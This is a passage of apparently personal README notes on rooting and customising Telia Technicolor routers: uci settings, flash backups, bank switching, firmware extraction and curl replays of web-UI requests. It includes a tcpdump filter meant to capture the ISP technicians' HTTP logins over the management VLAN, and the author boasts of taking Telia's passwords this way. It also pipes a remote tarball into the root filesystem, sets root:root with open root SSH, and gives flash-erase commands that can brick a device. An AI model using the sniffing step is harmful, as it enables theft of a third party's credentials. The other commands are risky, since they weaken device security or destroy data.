  • Now restart system on your router and you should see * messages:
    • 



/etc/init.d/system restart


    

  • Enable or Disable Time of Day ACL rules:
    • 



uci set tod.global.enabled='0'


    

  • For login with debug mode enabled, then please go to (Proably not possible but it is to try):
    • 



http://192.168.1.1/?debug=1


    

  • Enable or Disable so your router wont restart if there is an segmentation fault in a user space program:
    • 



uci set system.@coredump[0].reboot='0'
uci commit system


Just type below command for print the accesskey:


Just printing the first 8 characetrs from 0124 file


sed -e 's/^\(.\{8\}\).*/\1/' /proc/rip/0124


You can check the current running dns with


cat /etc/resolv.conf


Enable or Disable Content Sharing (Samba / DNLA):


uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'


Disable Time of Day ACL rules


uci set tod.global.enabled='1'


To disable mobile card since there is no button, execute:


uci set mobiled.device_defaults.enabled=0
uci commit


List installed packages:


opkg list_installed 


Add a new new modal:


uci set web.modalsmodalrule=rule
uci set web.ruleset_main.rules=modalsmodalsrule
uci add_list web.l2tpipsecservermodal.target='/modals/modals-name.lp'
uci set web.l2tpipsecservermodal.roles='roles'


A minimal alias definition for a bridged interface might be:


config interface lan
    option 'ifname' 'eth0'
    option 'type' 'bridge'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'br-lan'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'


For for a non-bridge interface


config interface lan
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'


Use your tg799 router as a switch instead as router:


Here is my example for using all ports for local network and also wan port(5):


cat << "EOF" > /etc/config/network
    config 'switch' 'eth0'
    option 'enable' '1'

    config 'switch_vlan' 'eth0_0'
    option 'device' 'eth0'
    option 'vlan' '0'
    option 'ports' '4 5' #wan

    config 'switch_vlan' 'eth0_1'
    option 'device' 'eth0'
    option 'vlan' '1'
    option 'ports' '3 5' #lan 1

    config 'switch_vlan' 'eth0_2'
    option 'device' 'eth0'
    option 'vlan' '2'
    option 'ports' '2 5' #lan2

    config 'switch_vlan' 'eth0_3'
    option 'device' 'eth0'
    option 'vlan' '3'
    option 'ports' '1 5' #lan3

    config 'switch_vlan' 'eth0_4'
    option 'device' 'eth0'
    option 'vlan' '4'
    option 'ports' '0 5' #lan4 


Create backup of all /dev/mtd[0-7]


Insert your usb that has ext2/ext3 or ext4 format:


for number in $(seq 0 7); do 
    grep -q "\/dev\/sd[a-z]1" /proc/mounts 
    if [[ $? = "0" ]]; then 
        usb_drive=$(grep "\/dev\/sd[a-z][0-9]" /proc/mounts |cut -d' ' -f1);
        mkdir -p /mnt/usb/${usb_drive}/backup_mtd;
    fi
    dd if=/dev/mtd${number} of=/mnt/usb/${usb_drive}/backup_mtd/mtd${number}.img;
done



Result for: 17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628:


 mtd1.img: Squashfs filesystem, little endian, version 4.0, xz compressed, 29719215 bytes, 3791 inodes, blocksize: 262144 bytes, created: Tue May  2 15:59:58 2017
 mtd2.img: ISO-8859 text, with very long lines (65536), with no line terminators
 mtd3.img: data
 mtd4.img: data
 mtd5.img: data
 mtd6.img: data



Just mount mtd1 and play around:


Screenshot


squashfuse mtd1.img /mnt/router/justforfun


Using bridge mode with a dedicated PPPoE ethernet port:


uci set network.lan.dns='1.1.1.1'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'


Add below stuff in same order as i posted them for avoid errors:


List all roles admin is not added to:


uci show|grep \.roles|grep -v admin
uci show|grep \.roles|grep -v admin|cut -d'=' -f1|sed 's/^/uci add_list /g'|sed 's/$/=admin/g' # copy and paste


So, now we want add admin to above roles so we can access same cards as superuser and telia.


Order to add: Rule > Ruleset > Modal > Target


Rules


uci set web.natalghelpermodal=rule
uci set web.relaymodal=rule
uci set web.systemmodal=rule
uci set web.iproutesmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.ltedoctor=rule
uci set web.ltemodal=rule
uci set web.lteprofiles=rule
uci set web.ltesim=rule
uci set web.ltesms=rule
uci set web.logconnections=rule
uci set web.logviewer=rule
uci set web.logviewer.roles=rule
uci set tod.global.enabled='1'
uci set mobiled.globals.enabled='1'
uci set mobiled.device_defaults.enabled='1'
uci commit; /etc/init.d/nginx restart


Ruleset


uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=diagnostics
uci add_list web.ruleset_main.rules=basicviewaccesscodemodal
uci add_list web.ruleset_main.rules=basicviewwifiguestmodal
uci add_list web.ruleset_main.rules=basicviewwifiguest5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifipskmodal
uci add_list web.ruleset_main.rules=basicviewwifipsk5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifissidmodal
uci add_list web.ruleset_main.rules=basicviewwifissid5GHzmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci commit; /etc/init.d/nginx restart


Targets


uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-accesscode-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifiguest-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifiguest5GHz-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifipsk-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifipsk5GHz-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifissid-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifissid5GHz-modal.lp'
uci set web.ltemodal.target='/modals/lte-modal.lp'
uci set web.ltedoctor.target='/modals/lte-doctor.lp'
uci set web.lteprofiles.target='/modals/lte-profiles.lp'
uci set web.logconnections.target='/modals/log-connections-modal.lp'
uci set web.logviewer.target='/modals/logviewer-modal.lp'
uci set web.ltesms.target='/modals/lte-sms.lp'
uci set web.ltesim.target='/modals/lte-sim.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'
uci commit; /etc/init.d/nginx restart


Roles


Show all rules were we want to add ourself (admin)


uci show|grep -i roles|grep -v admin


uci add_list web.uidefault.upgradefw_role=admin
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.relaymodal.roles='admin'
uci add_list web.systemmodal.roles='admin'
uci add_list web.natalghelper.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
uci add_list web.ltesms.roles='admin'
uci commit
/etc/init.d/nginx restart


If WEBGUI ever will get broken cause you fucked it up then reset router with 'rtfd --all (same as press on reset button)'.


If you want to keep files and just reset settings then use 'rtfd --soft' instead.


Screenshot


No space left and no commands works at all? Not even rtfd?


Run below command for a full factory reset:


Screenshot


**OBS OBS!! This bricked one of mine cause I wasnt careful enough: **


For all Telia but NOT VDNT-O!!


mtd -r erase rootfs_data


Just for VDNT-O


mtd -r userfs


Remove telia from all roles:


uci show|egrep -i "roles.*telia"|cut -d'=' -f1|sed 's/$/=telia/g'|xargs uci del_list


Once you added above you can browse to system-modal.lp and enable/disable ssh or set router in bootp mode:


Screenshot


.... or enable/disable assistance by your own, just give the credenticals to telia when its needed, feels better? :)


Change port:


assistance_port="$(uci get mwan.remoteassist.dest_ip)"|cut -d '/' -f1)"
uci set web.remote.port='<port>'


Screenshhot


Are you a sneeky bastard as myself? Cool! This is not far away how I got their passwords at top of this README. Figure out that part yourself.


tcpdump -i vlan_mgmt -s 0 -A 'tcp dst port <assistance_port> or tcp dst port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420 or tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504F5354' and host <vlan_mgmt_ip>


What does this mean?


See below example:


    Here 0x47455420 depicts the ASCII value of  characters  'G' 'E' 'T' ' '

    ┌───────────┬─────────────┐
    │ Character │ ASCII Value │
    ├───────────┼─────────────┤
    │ G         │ 47          │
    ├───────────┼─────────────┤
    │ E         │ 45          │
    ├───────────┼─────────────┤
    │ T         │ 54          │
    ├───────────┼─────────────┤
    │ Space     │ 20          │
    └───────────┴─────────────┘


So...


It means that you will grab all POST and GET http requests from telias client :)


Failsafe boot for VDNT-O


00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots
00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots
00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots
00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboot and now let it boot as normal



Failsafe boot for VBNT-H


00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots
00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots
00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots
00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboot and now let it boot as normal



Go to http://192.168.1.1 and use the exploit, once you entered shell:


echo "bank_1" > /proc/banktable/active



Now you can reboot and lay back :)


Firmware / Upgrade


    

  • Upgrade firmware from CLI:
    • 



sysupgrade --safe -o /tmp/172339o1901024closed.rbi


    

  • Default view:
    • 



Screenshot


    

  • This is all modals that are available from Telias devices in /www/docroot when all are enabled:
    • 



Screenhot


    

  • Add Administrator user to be allowed to upgrade firmwware:
    • 



uci add_list web.uidefault.upgradefw_role='admin'
uci commit


    

  • If you will try below command you will know how it feels to work for telia a support:
    • 



This part has been moved to its own directory WILLGETADDEDSOON


uci set web.usr_Administrator.role='superuser'
uci set web.usr_Administrator.role='telia'


    

  • System Modal:
    • 



Screenshot


    

  • cli Banner
    • 



Screenshot


    

  • When you have root access on your router you will be able to unlock rootfs_data and install a very powerful gui vs original from Telia thanks to Ansuel and other awesoem developers by below command:
    • 



curl -k https://repository.ilpuntotecnico.com/files/Ansuel/AGTEF/GUI.tar.bz2 --output /tmp/GUI.tar.bz2; 
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -;
/etc/init.d/rootdevice force; 
reboot


    

  • This is how it will look a like after you run the above command and router rebooted:
    • 



Screenshot


    

  • Stats view:
    • 



Screenshot


    

  • Telstra Extension:
    • 



Screenshot


Screenshot


    

  • Current bank setup:
    • 



grep . -r /proc/banktable/
/proc/banktable/notbootedoid:Unknown
/proc/banktable/bootedoid:5dcd7b8d4f5d980688c30569
/proc/banktable/passiveversion:17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628
/proc/banktable/activeversion:Unknown
/proc/banktable/inactive:bank_2
/proc/banktable/active:bank_1
/proc/banktable/notbooted:bank_1
/proc/banktable/booted:bank_2


    

  • Setup Ultimate Bank Plan
    • 



Accoring to


# Ensure two banks match in sizes
[ $(grep -c bank_ /proc/mtd) = 2 ] && \
[ "$(grep bank_1 /proc/mtd | cut -d' ' -f2)" = \
"$(grep bank_2 /proc/mtd | cut -d' ' -f2)" ] && {
[ "$(cat /proc/banktable/booted)" = "bank_1" ] && {
mtd -e bank_2 write /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 && \
mtd verify /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 || \
{ echo Clone verification failed, retry; exit; } }
cp -rf /overlay/$(cat /proc/banktable/booted) /tmp/bank_overlay_backup
rm -rf /overlay/*
cp -rf /tmp/bank_overlay_backup /overlay/bank_2
echo bank_1 > /proc/banktable/active
sync
mtd erase bank_1;
echo c > /proc/sysrq-trigger; }


    

  • Checking RBI firmware signature
    • 



signature_checker -b /tmp/firmware_to_check.rbi [-k /tmp/other_board_to_check.osik]binwalk -e any_decrypted_firmware.bin
mv firmware_to_check.rbi pubkey_to_check.osik _any_decrypted_firmware.bin.extracted/squashfs-root/tmp/
cd _any_decrypted_firmware.bin.extracted/squashfs-root
cp $(which qemu-arm-static) .
sudo chroot . ./qemu-arm-static /usr/bin/signature_checker -b /tmp/firmware_to_check.rbi -k /tmp/pubkey_to_check.osik


Extract RBI and Flash and preserve ssh access


Read more here


    

  • Extract firmware file:
    • 



cat "15516436o1361004closed.rbi" | (bli_parser && echo "Please wait..." && (bli_unseal | dd bs=4 skip=1 seek=1 of="15516436o1361004closed.bin"))


magic_value: BLI2
fim: 23
fia: PE
prodid: 0
varid: 0
version: 0.0.0.0
data_offset: 369
data_size: 24068698
timestamp: 0x276B8E76
boardname: VDNT-O
prodname: Technicolor TG799vn v2
varname: TG799vn v2
tagparserversion: 200
flashaddress: 0xC2000000
Please wait...


    

  • Prepare SSH access:
    • 



mkdir -p /overlay/$(cat /proc/banktable/booted)/etc
chmod 755 /overlay/$(cat /proc/banktable/booted) /overlay/$(cat /proc/banktable/booted)/etc
echo -e "echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
rm /overlay/\$(cat /proc/banktable/booted)/etc/rc.local
source /rom/etc/rc.local
" > /overlay/$(cat /proc/banktable/booted)/etc/rc.local
chmod +x /overlay/$(cat /proc/banktable/booted)/etc/rc.local
sync


    

  • Setup SSH access for our new firmware:
    • 



uci -q delete dropbear.afg
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart


-- Flash firmware via bin file:


    

  • Erase and write new firmware into booted bank and then emulate system crash to hard reboot
    • 



mtd -e $(cat /proc/banktable/booted) write "1720405o1901068closed.bin" $(cat /proc/banktable/booted)
Unlocking bank_1 ...
Erasing bank_1 ...

Writing from 1720405o1901068closed.bin to bank_1 ..


echo c > /proc/sysrq-trigger


    

  • Backup configuration:
    • 



tar -C /overlay -cz -f /tmp/backup-$(date -I).tar.gz $(cat /proc/banktable/booted)


    

  • Use the command below to manually create an archive with all your modified files from both firmware banks:
    • 



tar -C /overlay -cz -f /tmp/overlay-files-backup-$(date -I).tar.gz bank_1 bank_2


    

  • 

    If you prefer, you can rely on sysupgrade to achieve a similar result for the booted bank only.
    

    • 

  • 

    Save the Config:
    

    • 



sysupgrade -i -b /tmp/sysupgrade-backup-$(date -I).tar.gz


    

  • To restore the Config:
    • 



sysupgrade -f /tmp/sysupgrade-backup-*.tar.gz


Leds:


    

  • Turn on LED:
    • 



echo 1 > /sys/class/leds/power:green/brightness


    

  • Turn off LED:
    • 



echo 0 > /sys/class/leds/power:red/brightness


Clash


    

  • Add a new user with clash:
    • 



screenshot


clash newsrpuser -u <wuseman> -p <password>

 uci set web_back.usr_wuseman.srp_salt='D0124225'
 uci add web_back.default.users='usr_wuseman'
 uci add web_back.uidefault.defaultuser='wuseman'
 uci add web_back.usr_wuseman=user
 uci set web_back.usr_wuseman.name='wuseman'
 uci set web_back.usr_wuseman.role='wuseman'
 uci set web_back.usr_wuseman.gak_id='1'


cat << "EOF"  >> /etc/config/web
config user 'usr_wuseman'
option name 'wuseman'
option password_reminder '0'
option srp_verifier 'A955EDB6ECAC0536BA69F9D1F1C7F3D9F8A02FDF29170D4A8506A14F7E6F752FF845DACE10E6B3C66C15EAAB53896E41D541C22F32E9E0E8D60A1D7F1D187604BE8A5653B5CDF327542E8DBE5C8481E40C70BD0506448695F7E85338D4427187A49CF799CDDDD2DB3E6D652A25830C42024EB9A682ED5C27E36B159DB7617F41FF6ED5EF58163AC2C68AC26B3D57749AF3AFEF6352950D79A410150E27CE984EA375613737A235B5E28D006C5CE69DE40B651020505AEB7CE5986829D79B9E0375F5127F090CD400B2A2D06385F9931071415042979C8ED80D328BA4810A1692E263733DA9D85DC7E762859145A0D6A607447FCF4FFD53D144D8E018D4F345C9'
option srp_salt 'D0124225'
EOF


WebUI stuff via curl:


This is very intreseting since we are allowed to turn off and on interfaces, export config files and import config files,
get bankSize and alot more. The only thing I didnt had any luck with YET is the ?action=upgradfw part.


    

  • Wifi
    • 



curl 'http://192.168.1.1/modals/wireless-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'admin_state=1&standard=bgn&requested_channel=auto&channelwidth20=20MHz&channelwidth40=20MHz&channelwidth80=20MHz&sgi=1&cdd=1&stbc=1&ap_enabled=1&ssid=Telia-1DAA3B&ap_broadcast_ssid=1&security=wpa2-psk&wpa_psk=D4104BC782&wep_key=899BC4B768&radius_authent_ip=&radius_authent_port=1812&radius_authent_secret=899BC4B768&radius_account_ip=&radius_account_port=1813&radius_account_secret=&wps_enabled=0&wps_device_pin_code=&radius_authent_state=&radius_account_state=&acl_mode=unlock&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed


    

  • Enable IPV6
    • 



curl 'http://192.168.1.1/modals/ethernet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'localdevIP=192.168.1.1&localdevmask=255.255.255.0&localIPv6=1&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=1h&dnsServer=192.168.1.1&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed


Export / Import configuration


    

  • Import config via curl:
    • 



curl 'http://192.168.1.1/modals/gateway-modal.lp?action=import_config' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Content-Length: 142986' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFPdhvt6tT2AARW9e' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --compressed \
  --insecure


    

  • Export config via curl
    • 



curl 'http://192.168.1.1/modals/gateway-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --data-raw 'action=export_config&CSRFtoken=86b6d3a28f3cb5b743662f8032d97731fed9a42028b42ab71aa15718c09b2236' \
  --compressed \
  --insecure


Upgrade Firmware Procedur:


    

  1. import firmware
    2. 

  2. getbanksize
    3. 

  3. upgradfw
    4. 

  4. upgradegfwstatus
    5. 



curl 'http://192.168.1.1/modals/gateway-modal.lp?action=getbanksize' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure


curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefw' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Content-Length: 21973672' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLmy6iZzHQwMAbWUk' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed


curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefwstatus' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure


Interfaces


    

  • Turn VOIP off
    • 



curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=voip&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


- Turn IPTV off

curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=iptv&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


    

  • Turn WAN off
    • 



curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=wan&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


    

  • Turn MGMT off
    • 



curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=mgmt&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


    

  • Turn DHCP on
    • 



curl 'http://192.168.1.3/modals/ethernet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.3' \
  -H 'Referer: http://192.168.1.3/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=85a4f11d0eeae627f417a9815d0735716738c75e956c68ae19e4d64c46ce216d;' \
  --data-raw 'localdevIP=192.168.1.3&localdevmask=255.255.255.0&dhcpv6=disabled&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=24h&action=SAVE&fromModal=YES&CSRFtoken=681d0f3680a6867f379468b7861460f3d5ef0e947805d0112c756bac7f2f787c' \
  --compressed \
  --insecure


    

  • 

    Turn off DHCP Guest
    

    curl 'http://192.168.1.3/modals/ethernet-modal.lp?intf=guest' 
    
-H 'Connection: keep-alive' 
    
-H 'Accept: text/html, /; q=0.01' 
    
-H 'X-Requested-With: XMLHttpRequest' 
